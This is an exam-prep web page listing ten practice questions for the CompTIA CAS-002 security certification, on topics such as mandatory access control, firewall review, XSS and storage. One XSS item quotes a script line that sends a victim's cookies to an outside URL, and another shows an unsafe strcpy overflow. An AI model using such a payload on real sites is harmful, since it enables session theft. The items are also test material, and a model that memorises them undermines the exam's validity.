1. Home
  2. CompTIA
  3. CAS-002

CompTIA CAS-002 Online Practice Questions and Exam Preparation

CAS-002 Exam Details

  • Exam Code
    :CAS-002
  • Exam Name
    :CompTIA Advanced Security Practitioner (CASP+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :733 Q&As
  • Last Updated
    :Jan 22, 2024

CompTIA CAS-002 Online Questions & Answers

  • Question 171:

    A breach at a government agency resulted in the public release of top secret information. The Chief Information Security Officer has tasked a group of security professionals to deploy a system which will protect against such breaches in the future.

    Which of the following can the government agency deploy to meet future security needs?

    A. A DAC which enforces no read-up, a DAC which enforces no write-down, and a MAC which uses an access matrix.
    B. A MAC which enforces no write-up, a MAC which enforces no read-down, and a DAC which uses an ACL.
    C. A MAC which enforces no read-up, a MAC which enforces no write-down, and a DAC which uses an access matrix.
    D. A DAC which enforces no write-up, a DAC which enforces no read-down, and a MAC which uses an ACL.

  • Question 172:

    A security administrator has been conducting a security assessment of Company XYZ for the past two weeks. All of the penetration tests and other assessments have revealed zero flaws in the systems at Company XYZ. However, Company XYZ reports that it has been the victim of numerous security incidents in the past six months. In each of these incidents, the criminals have managed to exfiltrate large volumes of data from the secure servers at the company. Which of the following techniques should the investigation team consider in the next phase of their assessment in hopes of uncovering the attack vector the criminals used?

    A. Vulnerability assessment
    B. Code review
    C. Social engineering
    D. Reverse engineering

  • Question 173:

    An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this?

    A. Access control lists
    B. SELinux
    C. IPtables firewall
    D. HIPS

  • Question 174:

    Customer Need:

    "We need the system to produce a series of numbers with no discernible mathematical progression for use by our Java based, PKI-enabled, customer facing website."

    Which of the following BEST restates the customer need?

    A. The system shall use a pseudo-random number generator seeded the same every time.
    B. The system shall generate a pseudo-random number upon invocation by the existing Java program.
    C. The system shall generate a truly random number based upon user PKI certificates.
    D. The system shall implement a pseudo-random number generator for use by corporate customers.

  • Question 175:

    Which of the following can aid a buffer overflow attack to execute when used in the creation of applications?

    A. Secure cookie storage
    B. Standard libraries
    C. State management
    D. Input validation

  • Question 176:

    CORRECT TEXT

    Compliance with company policy requires a quarterly review of firewall rules. A new administrator is asked to conduct this review on the internal firewall sitting between several Internal networks. The intent of this firewall is to make traffic more

    restrictive. Given the following information answer the questions below:

    User Subnet: 192.168.1.0/24 Server Subnet: 192.168.2.0/24 Finance Subnet:192.168.3.0/24

    Instructions: To perform the necessary tasks, please modify the DST port, Protocol, Action, and/or Rule Order columns. Firewall ACLs are read from the top down

    Task 1) An administrator added a rule to allow their machine terminal server access to the server subnet. This rule is not working. Identify the rule and correct this issue.

    Task 2) All web servers have been changed to communicate solely over SSL. Modify the appropriate rule to allow communications.

    Task 3) An administrator added a rule to block access to the SQL server from anywhere on the network. This rule is not working. Identify and correct this issue.

    Task 4) Other than allowing all hosts to do network time and SSL, modify a rule to ensure that no other traffic is allowed.

  • Question 177:

    The security administrator is responsible for the confidentiality of all corporate data. The company's servers are located in a datacenter run by a different vendor. The vendor datacenter hosts servers for many different clients, all of whom have access to the datacenter. None of the racks are physically secured. Recently, the company has been the victim of several attacks involving data injection and exfiltatration. The security administrator suspects these attacks are due to several new network based attacks facilitated by having physical access to a system. Which of the following BEST describes how to adapt to the threat?

    A. Apply port security to all switches, switch to SCP, and implement IPSec tunnels between devices.
    B. Apply two factor authentication, require point to point VPNs, and enable log auditing on all devices.
    C. Apply port security to all routers, switch to telnet, and implement point to point VPNs on all servers.
    D. Apply three factor authentication, implement IPSec, and enable SNMP.

  • Question 178:

    When attending the latest security conference, an information security administrator noticed only a few people carrying a laptop around. Most other attendees only carried their smartphones. Which of the following would impact the security of conference's resources?

    A. Wireless network security may need to be increased to decrease access of mobile devices.
    B. Physical security may need to be increased to deter or prevent theft of mobile devices.
    C. Network security may need to be increased by reducing the number of available physical network jacks.
    D. Wireless network security may need to be decreased to allow for increased access of mobile devices.

  • Question 179:

    Which of the following displays an example of a XSS attack?

    A. document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
    B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
    C. Username: PassworD.
    D. #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() {char buf[8]; strcpy(buf, code); }

  • Question 180:

    A storage administrator would like to make storage available to some hosts and unavailable to other hosts. Which of the following would be used?

    A. LUN masking
    B. Deduplication
    C. Multipathing
    D. Snapshots

Related Exams:

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CAS-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.